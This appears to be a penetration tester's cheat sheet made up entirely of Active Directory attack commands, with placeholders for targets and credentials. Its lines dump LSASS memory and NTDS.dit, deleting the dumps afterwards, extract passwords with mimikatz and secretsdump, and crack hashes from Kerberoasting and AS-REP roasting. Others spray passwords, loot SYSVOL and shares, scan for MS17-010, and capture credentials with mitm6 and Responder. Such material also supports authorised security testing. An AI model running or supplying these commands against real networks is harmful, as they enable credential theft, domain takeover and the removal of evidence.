cat /etc/resolv.conf
nmcli dev show eth2
nslookup -type=srv _ldap._tcp.dc._msdcs.<domain>
nmap -script broadcast-dhcp-discover
sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --sam
sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --lsa
sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --ntds
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
python3 psexec.py <domain>/<user>:<password>@<ip> "C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp"
smbclient <domain>/<user>@<ip>
use C$
cd Windows
cd Temp
put procdump.exe
get lsass.dmp
rm procdump.exe
rm lsass.dmp
C:\>mimikatz.exe
sekurlsa::minidump <DUMPFILENAME>
sekurlsa::LogonPasswords
pypykatz lsa minidump <lsass.dmp>
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\Windows\Temp\ntds
ifm: quit
ntdsutil: quit
ntdsutil.exe "activate instance ntfs" "ifm" "Create Full C:\Windows\Temp\ntds" quit quit
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
python3 secretsdump.py <domain>/<user>:<password>@<ip> -just-dc
python3 secretsdump.py -ntds '/home/kali/Downloads/Active Directory/ntds.dit' -system '/home/kali/Downloads/registry/SYSTEM' -outputfile hashs.ntds LOCAL
hashcat -m 1000 <hashes.file> <dictionary.file> --force
python3 GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:'<password>'
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <hashcat | john> -outputfile <output_AS_REP_responses_file>
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>
enum4linux -U <dc-ip> | grep 'user:'
cme smb <ip> -U <user> -p '<password>' --users
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=names.txt <ip>
python kerbrute.py -domain <domain> -users users.txt -passwords passwords.txt -outputfile output.txt
while read ip;do echo $ip; smbmap -r --depth 1 -H $ip;done < <ips_file> | tee <smbmap_without_auth_file>
while read ip;do echo $ip; smbmap -u <user> -p '<password>' -d <domain> -r --depth 1 -H $ip;done < <ips_file> | tee <smbmap_user_file>
python ldapdomaindump.py -u '<domain>\<user>' -p <password> -o ldapdomaindump -n <ns_ip> <dc_ip>
smbclient -U <user> -L <ip> ///SYSVOL
smbclient \\\\<ip>\\sysvol -U <user>
prompt off
recurse on
lcd /home/kali/Downloads/sysvol
mget ./*
./bloodhound.py -u <username> -p '<password>' -d <domain> -ns <ns_ip> -dc <dc_hostname>
python RunFinger.py -i <ip/mask>
nmap -n -Pn -sT -v --script smb-vuln-ms17-010 -p445 --open -oA ms17-010-nmap <ip>
~/tools/wannacry/wannacry -net <ip/mask> -out <ip>-ms17-010-wanna.txt
sudo nmap -Pn -sT --script=vulners -sV --open -oA all-ports-nmap -p 21,22,2222,23,80,8000,8001,8002,8004,8006,8007,8008,8080,8888,88,139,143,389,443,8443,9443,445,623,49152,636,1099,1433,1434,1500,2001,2010,2181,2375,2809,9043,9060,9080,9501,9502,9503,5558,5559,7873,8879,3306,3389,5800-5810,5900,5901,5432,5433,5555,5557,5666,10050,10051,7001,9000,27017,27018,50013,1521-1527,3200-3299,4786,9200,9300,5985,5986,50070,6443,8111,8500,8501,8200,8201,10250 <ip/mask>
cat <ips-file> | xargs -I IP python IOXIDResolver.py -t IP | tee <IOXIDResolver-file>
sudo ./onesixtyone -c snmp_pass.txt -o <onesixtyone-file.txt> <ip/mask>
sudo python3 mitm6.py -i eth2 -v -d <domain>
sudo python3 smbserver.py -ip <local-ip> data /tmp | tee <mitm6_file>
sudo python3 Responder.py -I eth2 -A